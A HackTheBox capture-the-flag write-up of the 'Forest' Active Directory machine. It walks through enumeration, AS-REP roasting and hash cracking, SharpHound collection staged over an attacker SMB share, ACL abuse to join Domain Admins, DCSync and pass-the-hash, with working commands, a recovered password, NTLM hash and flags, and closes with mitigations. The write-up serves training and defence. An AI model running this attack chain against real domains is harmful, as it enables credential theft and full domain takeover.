htb-writeups

Forest HTB Writeup

Machine: Forest
Platform: HackTheBox
Difficulty: Medium
OS: Windows

Reconnaissance

Initial Scan

First, I set the target IP and performed a full port scan:

export target=10.129.19.180
sudo nmap -p- --min-rate 1000 -sT -vvv $target

Discovered Ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 5985, 9389, 47001, 49664, 49665, 49666, 49668, 49671, 49676, 49677, 49681, 49698, 50016

Service Enumeration

sudo nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49668,49671,49676,49677,49681,49698,50016 -T4 $target

Key Findings:

• Domain: htb.local
• Active Directory Environment
• WinRM (5985) open - potential entry point

DNS Enumeration

Attempted zone transfers but they were blocked:

dig axfr @10.129.19.180 htb.local
dig axfr @10.129.19.180 forest.htb

SMB Enumeration

Anonymous login was successful but no shares were accessible:

smbclient -N -L //10.129.19.180/

LDAP Enumeration

ldapsearch -x -H ldap://10.129.19.180 -s base namingcontexts

Discovered base DN: DC=htb,DC=local

RPC Client Enumeration

This revealed the most valuable information - domain users and groups:

rpcclient -U "" -N 10.129.19.180

# Enumerate users
rpcclient $> enumdomusers

Discovered Users:

• Administrator
• Guest
• krbtgt
• svc-alfresco
• sebastien
• lucinda
• andy
• mark
• santi
• Several service accounts

Discovered Groups:

• Domain Admins
• Domain Users
• Enterprise Admins
• Service Accounts
• Privileged IT Accounts
• Exchange Windows Permissions

Initial Foothold

AS-REP Roasting Attack

Since we discovered multiple users, I attempted AS-REP Roasting:

# Create users list from rpcclient output
echo "Administrator" > users
echo "Guest" >> users
echo "krbtgt" >> users
echo "svc-alfresco" >> users
echo "sebastien" >> users
echo "lucinda" >> users
echo "andy" >> users
echo "mark" >> users
echo "santi" >> users

# Perform AS-REP Roasting
for i in $(cat users); do 
    impacket-GetNPUsers -no-pass -dc-ip 10.129.19.180 HTB.LOCAL/${i} | grep -v Impacket 2>/dev/null 
done

Success! User svc-alfresco had Kerberos pre-authentication disabled and returned a crackable AS-REP hash:

$krb5asrep$23$svc-alfresco@HTB.LOCAL:9cd60576bdc3ac0490a0dd377dbd9977$184fe48cb91e43c670daa1f582ff3848abeff3234fd40845fdec837c759e68f46bce3d2416001d13e1b6e4c0fb41cc27cb63e5610a8b0bb1b89fce6d36a233f44e11484958038feb13f7ee301b0e5d723b4b78fb89f53da369647a0691207f884ebc24c8294e4f2c6e6a5ba5c2fa8ab1c4cdc9f9e21a1fd41210d18320964c31a5eba59a1cf418317195401dfe5cfd7eb2d6a273430599fb76c52dda260b75f96af2d8bf1381765c56c0ef801e158b47d318536227747bb3ceddb83378fa6f4d146336f6f1bbdcc93be6c26bc85c7d0a539cb29813bd9a1584cf32befe1230d196dc023e75be

Password Cracking

Saved the hash to a file and cracked it with hashcat:

echo '$krb5asrep$23$svc-alfresco@HTB.LOCAL:...' > hash
hashcat -m 18200 -a 0 hash /usr/share/wordlists/rockyou.txt

Cracked Password: s3rvice

Initial Access

With valid credentials, I accessed the system via WinRM:

evil-winrm -i 10.129.19.180 -u svc-alfresco -p 's3rvice'

User Flag: 101f7af620a48d0d9d74784d7836cccf

Privilege Escalation

BloodHound Setup

To understand the Active Directory environment better, I set up BloodHound:

# Install BloodHound
sudo apt update && sudo apt install -y docker.io docker-compose
mkdir -p ~/bloodhound && cd ~/bloodhound
wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz
tar -xzf bloodhound-cli-linux-amd64.tar.gz
./bloodhound-cli install

# Start BloodHound
./bloodhound-cli start

Data Collection

I needed to collect AD data using SharpHound:

# On attacker machine - start SMB server
impacket-smbserver share . -smb2support -username ara -password ara

# On victim machine via Evil-WinRM
net use \\10.10.14.142\share /u:ara ara
copy \\10.10.14.142\share\SharpHound.exe
.\SharpHound.exe

# After collection, transfer back to attacker
copy 20251105051325_BloodHound.zip \\10.10.14.142\share\blood.zip

BloodHound Analysis

The analysis revealed a critical attack path:

1. svc-alfresco is member of Service Accounts
2. Service Accounts is member of Privileged IT Accounts
3. Privileged IT Accounts has WriteDACL on Domain Admins group

This means we can modify the Domain Admins group permissions!

ACL Abuse Attack

Using PowerView, I exploited the WriteDACL permission:

# Load PowerView (uploaded via SMB)
. .\PowerView.ps1

# Create credential object
$SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $SecPassword)

# Step 1: Add WriteMembers permission to Domain Admins group
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Domain Admins" -Rights WriteMembers

# Step 2: Add ourselves to Domain Admins group
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'svc-alfresco' -Credential $Cred

# Verify we're now in Domain Admins
Get-DomainGroupMember -Identity 'Domain Admins'

Domain Compromise via DCSync

With Domain Admin privileges, I performed DCSync to extract all password hashes:

impacket-secretsdump svc-alfresco:s3rvice@10.129.19.180

Administrator Hash Extracted:

htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

Root Access

Finally, I used Pass-the-Hash to gain Administrator access:

evil-winrm -i 10.129.19.180 -u Administrator -H '32693b11e6aa90eb43d32c72a07ceea6'

Root Flag: 3d82964c9f5150ec7c13ac4ec2115ea8

Attack Summary

1. Reconnaissance: Discovered domain users via RPC enumeration
2. Initial Access: AS-REP Roasting on svc-alfresco → Password cracking → WinRM access
3. Privilege Escalation: BloodHound analysis → ACL abuse → Added to Domain Admins
4. Domain Compromise: DCSync → Extracted Administrator hash → Pass-the-Hash

Security Issues & Mitigations

Vulnerabilities Identified:

1. AS-REP Roasting: User with pre-authentication disabled
2. Weak Service Account Password: Easily crackable password
3. Excessive Group Permissions: Privileged IT Accounts had unnecessary WriteDACL on Domain Admins

Recommended Mitigations:

1. Enable Kerberos pre-authentication for all users
2. Implement strong password policies for service accounts
3. Apply principle of least privilege for group permissions
4. Regularly audit ACLs and group memberships
5. Monitor for DCSync attacks and unusual group modifications

Tools Used

• nmap: Network scanning
• rpcclient: User enumeration
• impacket: AS-REP Roasting, DCSync, SMB server
• hashcat: Password cracking
• evil-winrm: Remote access
• BloodHound: AD privilege escalation analysis
• PowerView: AD exploitation

This comprehensive approach demonstrates the importance of proper Active Directory configuration and the dangers of excessive permissions in enterprise environments.